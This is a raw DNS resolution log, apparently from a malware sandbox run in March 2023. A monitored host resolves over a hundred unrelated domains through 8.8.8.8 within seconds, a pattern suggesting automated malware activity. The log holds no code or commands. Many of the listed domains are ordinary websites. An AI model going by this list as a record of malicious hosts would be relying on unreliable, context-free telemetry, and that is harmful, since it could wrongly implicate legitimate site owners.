                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.740613937 CET8.8.8.8192.168.2.60xa382No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.759208918 CET8.8.8.8192.168.2.60xce5cNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.788821936 CET8.8.8.8192.168.2.60x9164No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.808943987 CET8.8.8.8192.168.2.60xe2e4No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.820833921 CET8.8.8.8192.168.2.60xd303No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.878645897 CET8.8.8.8192.168.2.60xbb50No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.878645897 CET8.8.8.8192.168.2.60xbb50No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.878645897 CET8.8.8.8192.168.2.60xbb50No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.878645897 CET8.8.8.8192.168.2.60xbb50No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:08.880122900 CET8.8.8.8192.168.2.60xb541No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.084929943 CET8.8.8.8192.168.2.60x1f73No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.105146885 CET8.8.8.8192.168.2.60xc20fServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.203725100 CET8.8.8.8192.168.2.60xb432No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.249845028 CET8.8.8.8192.168.2.60x7401No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.249845028 CET8.8.8.8192.168.2.60x7401No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.249845028 CET8.8.8.8192.168.2.60x7401No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.304235935 CET8.8.8.8192.168.2.60xea3dNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.350636959 CET8.8.8.8192.168.2.60x7873No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.486217976 CET8.8.8.8192.168.2.60xb2a4No error (0)mjrcpas.com154.81.136.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.549046040 CET8.8.8.8192.168.2.60x2eb3No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.554666042 CET8.8.8.8192.168.2.60x5426No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.554666042 CET8.8.8.8192.168.2.60x5426No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.554666042 CET8.8.8.8192.168.2.60x5426No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.556607008 CET8.8.8.8192.168.2.60x134aName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.576174021 CET8.8.8.8192.168.2.60xc711No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.600403070 CET8.8.8.8192.168.2.60x5345No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.624993086 CET8.8.8.8192.168.2.60xea8Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.794836998 CET8.8.8.8192.168.2.60xde2fName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.835189104 CET8.8.8.8192.168.2.60xbc2cNo error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.839503050 CET8.8.8.8192.168.2.60xab8aNo error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.864963055 CET8.8.8.8192.168.2.60xb07cName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.870064974 CET8.8.8.8192.168.2.60xed37Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.959127903 CET8.8.8.8192.168.2.60xb65cNo error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.959127903 CET8.8.8.8192.168.2.60xb65cNo error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.963934898 CET8.8.8.8192.168.2.60xb320No error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:09.978929043 CET8.8.8.8192.168.2.60xfdd4Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.019646883 CET8.8.8.8192.168.2.60x11c4No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.021164894 CET8.8.8.8192.168.2.60x9eadNo error (0)any-s.net185.104.28.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.029117107 CET8.8.8.8192.168.2.60x80dbNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.121603966 CET8.8.8.8192.168.2.60x5410No error (0)top1oil.com172.67.71.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.121603966 CET8.8.8.8192.168.2.60x5410No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.121603966 CET8.8.8.8192.168.2.60x5410No error (0)top1oil.com104.26.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.121645927 CET8.8.8.8192.168.2.60xe63cNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.132069111 CET8.8.8.8192.168.2.60x9b2dNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.132069111 CET8.8.8.8192.168.2.60x9b2dNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.132069111 CET8.8.8.8192.168.2.60x9b2dNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.132069111 CET8.8.8.8192.168.2.60x9b2dNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.134870052 CET8.8.8.8192.168.2.60x3704Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.147891045 CET8.8.8.8192.168.2.60xe51bServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.391486883 CET8.8.8.8192.168.2.60x7216No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.439124107 CET8.8.8.8192.168.2.60x7d92Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.469696045 CET8.8.8.8192.168.2.60x5cd1Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.488472939 CET8.8.8.8192.168.2.60x3680No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.504285097 CET8.8.8.8192.168.2.60xeadfName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.645303011 CET8.8.8.8192.168.2.60x341cServer failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.684644938 CET8.8.8.8192.168.2.60x8c27No error (0)ruzee.com207.180.198.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.686228991 CET8.8.8.8192.168.2.60x1be3No error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.688183069 CET8.8.8.8192.168.2.60x1960No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.693351984 CET8.8.8.8192.168.2.60x12c2No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.704562902 CET8.8.8.8192.168.2.60xc5ebNo error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.710540056 CET8.8.8.8192.168.2.60xa9b1Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.730288982 CET8.8.8.8192.168.2.60x1c15No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.909404039 CET8.8.8.8192.168.2.60x50No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:10.946224928 CET8.8.8.8192.168.2.60x7692No error (0)avse.hu185.129.138.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.014164925 CET8.8.8.8192.168.2.60xbeb8No error (0)assideum.com52.219.178.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.067527056 CET8.8.8.8192.168.2.60x314dNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.089611053 CET8.8.8.8192.168.2.60x1274No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.232749939 CET8.8.8.8192.168.2.60x905dNo error (0)anduran.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.232749939 CET8.8.8.8192.168.2.60x905dNo error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.232749939 CET8.8.8.8192.168.2.60x905dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.232749939 CET8.8.8.8192.168.2.60x905dNo error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.268354893 CET8.8.8.8192.168.2.60xe51bServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.296861887 CET8.8.8.8192.168.2.60x24abNo error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.353995085 CET8.8.8.8192.168.2.60x410No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.405374050 CET8.8.8.8192.168.2.60xc1b3Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.432660103 CET8.8.8.8192.168.2.60xc8a3No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.467112064 CET8.8.8.8192.168.2.60x7d7eNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.467834949 CET8.8.8.8192.168.2.60xdb5eName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.468183041 CET8.8.8.8192.168.2.60x8bfcNo error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.473093033 CET8.8.8.8192.168.2.60x834Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.480062962 CET8.8.8.8192.168.2.60x2d26No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.489358902 CET8.8.8.8192.168.2.60x9cc4No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.622204065 CET8.8.8.8192.168.2.60xc261No error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.639413118 CET8.8.8.8192.168.2.60x57f0No error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.663150072 CET8.8.8.8192.168.2.60x493eNo error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.663150072 CET8.8.8.8192.168.2.60x493eNo error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.691507101 CET8.8.8.8192.168.2.60x5094No error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.793562889 CET8.8.8.8192.168.2.60xb77No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.811608076 CET8.8.8.8192.168.2.60xb144No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.829241037 CET8.8.8.8192.168.2.60x72f5No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.829241037 CET8.8.8.8192.168.2.60x72f5No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.829241037 CET8.8.8.8192.168.2.60x72f5No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.829241037 CET8.8.8.8192.168.2.60x72f5No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.859987020 CET8.8.8.8192.168.2.60x3d56Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:11.982531071 CET8.8.8.8192.168.2.60xd19aNo error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.030013084 CET8.8.8.8192.168.2.60xd1d9No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.055408001 CET8.8.8.8192.168.2.60x476dNo error (0)thiessen.net62.75.251.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.120347023 CET8.8.8.8192.168.2.60x305No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.120347023 CET8.8.8.8192.168.2.60x305No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.132728100 CET8.8.8.8192.168.2.60x769Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.191479921 CET8.8.8.8192.168.2.60x2de5Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.210524082 CET8.8.8.8192.168.2.60x3324No error (0)notis.ru185.178.208.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.229300976 CET8.8.8.8192.168.2.60xc56eNo error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.229300976 CET8.8.8.8192.168.2.60xc56eNo error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.229300976 CET8.8.8.8192.168.2.60xc56eNo error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.229300976 CET8.8.8.8192.168.2.60xc56eNo error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.339158058 CET8.8.8.8192.168.2.60x2b3aNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.363771915 CET8.8.8.8192.168.2.60x808fName error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.371539116 CET8.8.8.8192.168.2.60xf884No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.408777952 CET8.8.8.8192.168.2.60xfe65No error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.408777952 CET8.8.8.8192.168.2.60xfe65No error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.409404039 CET8.8.8.8192.168.2.60x8cc3Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.515925884 CET8.8.8.8192.168.2.60xd934Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.522209883 CET8.8.8.8192.168.2.60xd9bcNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.522209883 CET8.8.8.8192.168.2.60xd9bcNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.522209883 CET8.8.8.8192.168.2.60xd9bcNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.522209883 CET8.8.8.8192.168.2.60xd9bcNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.547278881 CET8.8.8.8192.168.2.60x834Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.587647915 CET8.8.8.8192.168.2.60x4166No error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.650782108 CET8.8.8.8192.168.2.60x4333No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.657067060 CET8.8.8.8192.168.2.60x8073Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.730513096 CET8.8.8.8192.168.2.60xd951Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.757543087 CET8.8.8.8192.168.2.60xfce1No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.771397114 CET8.8.8.8192.168.2.60x18b9No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.794431925 CET8.8.8.8192.168.2.60xe018No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.794431925 CET8.8.8.8192.168.2.60xe018No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.798857927 CET8.8.8.8192.168.2.60x3076No error (0)dspears.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.798857927 CET8.8.8.8192.168.2.60x3076No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.798857927 CET8.8.8.8192.168.2.60x3076No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.798857927 CET8.8.8.8192.168.2.60x3076No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.800261974 CET8.8.8.8192.168.2.60xa29dNo error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.800261974 CET8.8.8.8192.168.2.60xa29dNo error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.804301023 CET8.8.8.8192.168.2.60xefe8Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.813591003 CET8.8.8.8192.168.2.60x7559No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.813591003 CET8.8.8.8192.168.2.60x7559No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.813591003 CET8.8.8.8192.168.2.60x7559No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.890239000 CET8.8.8.8192.168.2.60x6564No error (0)hchc.org34.224.10.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.890239000 CET8.8.8.8192.168.2.60x6564No error (0)hchc.org52.11.37.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.905527115 CET8.8.8.8192.168.2.60x385aNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.905527115 CET8.8.8.8192.168.2.60x385aNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.905527115 CET8.8.8.8192.168.2.60x385aNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.905527115 CET8.8.8.8192.168.2.60x385aNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.978434086 CET8.8.8.8192.168.2.60x6b31No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:12.981791973 CET8.8.8.8192.168.2.60xcd8dServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.121809006 CET8.8.8.8192.168.2.60xd360No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.122803926 CET8.8.8.8192.168.2.60x9fdbNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.153140068 CET8.8.8.8192.168.2.60xd493No error (0)shztm.ru52.50.65.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.173605919 CET8.8.8.8192.168.2.60x1329Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.175479889 CET8.8.8.8192.168.2.60x3b8aNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.198518038 CET8.8.8.8192.168.2.60x417Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.200026989 CET8.8.8.8192.168.2.60x130eNo error (0)x96.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.200026989 CET8.8.8.8192.168.2.60x130eNo error (0)x96.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.226900101 CET8.8.8.8192.168.2.60x202eName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.230140924 CET8.8.8.8192.168.2.60xb8eNo error (0)hbfuels.com85.233.160.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.234185934 CET8.8.8.8192.168.2.60xdb96No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.234185934 CET8.8.8.8192.168.2.60xdb96No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.236299038 CET8.8.8.8192.168.2.60x5f35Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.238867044 CET8.8.8.8192.168.2.60xa4f6No error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.245579004 CET8.8.8.8192.168.2.60x56ebNo error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.262315035 CET8.8.8.8192.168.2.60xc1e3No error (0)onzcda.com35.186.238.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:13.277199984 CET8.8.8.8192.168.2.60x4eb0Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
